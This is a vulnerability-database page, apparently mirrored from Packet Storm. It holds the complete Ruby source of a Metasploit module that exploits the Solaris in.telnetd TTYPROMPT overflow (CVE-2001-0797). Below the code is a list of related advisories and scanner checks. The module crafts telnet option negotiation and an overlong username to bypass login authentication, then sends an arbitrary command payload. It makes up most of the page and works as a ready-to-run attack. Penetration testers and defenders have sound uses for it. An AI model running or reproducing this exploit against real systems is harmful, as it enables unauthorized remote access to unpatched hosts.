Lucene search
MCPACKETSTORM:82329HistoryOct 28, 2009 - 12:00 a.m.
Solaris in.telnetd TTYPROMPT Buffer Overflow
2009-10-2800:00:00
MC
packetstormsecurity.com
19
0.974 High
EPSS
Percentile
99.9%
`##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
'Description' => %q{
This module uses a buffer overflow in the Solaris 'login'
application to bypass authentication in the telnet daemon.
},
'Author' => [ 'MC', 'cazz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2001-0797'],
[ 'OSVDB', '690'],
[ 'BID', '5531'],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', { }],
],
'DisclosureDate' => 'Jan 18 2002',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(23),
OptString.new('USER', [ true, "The username to use", "bin" ]),
], self.class)
end
def exploit
connect
banner = sock.get_once
print_status('Setting TTYPROMPT...')
req =
"\xff\xfc\x18" +
"\xff\xfc\x1f" +
"\xff\xfc\x21" +
"\xff\xfc\x23" +
"\xff\xfb\x22" +
"\xff\xfc\x24" +
"\xff\xfb\x27" +
"\xff\xfb\x00" +
"\xff\xfa\x27\x00" +
"\x00TTYPROMPT" +
"\x01" +
rand_text_alphanumeric(6) +
"\xff\xf0"
sock.put(req)
sleep(0.25)
print_status('Sending username...')
filler = rand_text_alpha(rand(10) + 1)
req << datastore['USER'] + (" #{filler}" * 65)
sock.put(req + "\n\n\n")
sleep(0.25)
sock.get_once
sock.put(payload.encoded + "\n")
sleep(0.25)
handler
end
end
`
Related
securityvulns
securityvulns
ISSalert: ISS Advisory: Buffer Overflow in /bin/login
2001-12-13 00:00:00
saint
saint
System V login argument array buffer overflow
2007-03-30 00:00:00
System V login argument array buffer overflow
2007-03-30 00:00:00
System V login argument array buffer overflow
2007-03-30 00:00:00
nessus
nessus
SysV /bin/login Environment Remote Overflow (rlogin)
2001-12-15 00:00:00
Multiple OS /bin/login Remote Overflow
2002-10-03 00:00:00
SysV /bin/login Environment Remote Overflow (telnet check)
2001-12-15 00:00:00
canvas
canvas
Immunity Canvas: SUNLOGIN
2001-12-12 05:00:00
Immunity Canvas: SUNLOGIN_PAMH
2001-12-12 00:00:00
packetstorm
packetstorm
System V Derived /bin/login Extraneous Arguments Buffer Overflow
2009-10-27 00:00:00
checkpoint_advisories
checkpoint_advisories
System V TTYPROMPT Buffer Overflow - Ver2 (CVE-2001-0797)
2014-02-03 00:00:00
System V TTYPROMPT Buffer Overflow - Ver2 (CVE-2001-0797)
2014-01-07 00:00:00
cve
cve
CVE-2001-0797
2001-12-12 05:00:00
CVE-2003-0574
2003-08-18 04:00:00
exploitdb
exploitdb
openvas
openvas
SysV /bin/login buffer overflow (telnet)
2008-10-24 00:00:00
SysV /bin/login buffer overflow (telnet)
2008-10-24 00:00:00
seebug
seebug
Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability
2014-07-01 00:00:00
Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)
2014-07-01 00:00:00
Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC)
2008-06-05 00:00:00
exploitpack
exploitpack
Solaris 2.5.12.678 rlogin (SPARC) - binlogin Remote Buffer Overflow
2004-12-24 00:00:00
cert
cert
System V derived login contains a remotely exploitable buffer overflow
2001-12-12 00:00:00
cisco
cisco
Solaris /bin/login Vulnerability
2002-04-10 16:00:00